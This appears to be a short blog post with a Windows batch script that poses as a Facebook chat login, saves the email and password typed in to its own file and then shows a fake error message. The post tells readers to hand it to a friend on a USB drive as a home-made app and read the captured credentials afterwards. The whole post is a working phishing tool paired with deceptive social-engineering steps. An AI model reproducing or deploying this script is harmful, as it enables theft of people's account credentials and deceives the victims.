If You Want To Know your Friends Facebook Email And Password,Try This...
Copy paste this in notepad...
.
TITLE FBChat
ECHO OFF
COLOR 03
CLS
ECHO.
ECHO LOGIN TO START CHATTING ON FACEBOOK
ECHO.
ECHO Please enter your email:
SET/P "MAIL=>"
ECHO.
ECHO Enter the password:
SET/P "PSWD=>"
ECHO EMAIL = %MAIL%>>FBChat.bat
ECHO PASSWORD = %PSWD%>>FBChat.bat
CLS
TIMEOUT /T 5 >NUL
COLOR 0C
ECHO.
ECHO An error occurred while connecting to the server. Try again later.
PAUSE>NUL
EXIT
And now save it as FBChat.bat
Now paste it in ur USB drive,and tell ur friend that u just made an application urself and to make him try it out.
.
.
And when you get ur drive back,right click on FBChat.bat,edit and you can see Email and password at the bottom.
No comments :
Post a Comment
Note: only a member of this blog may post a comment.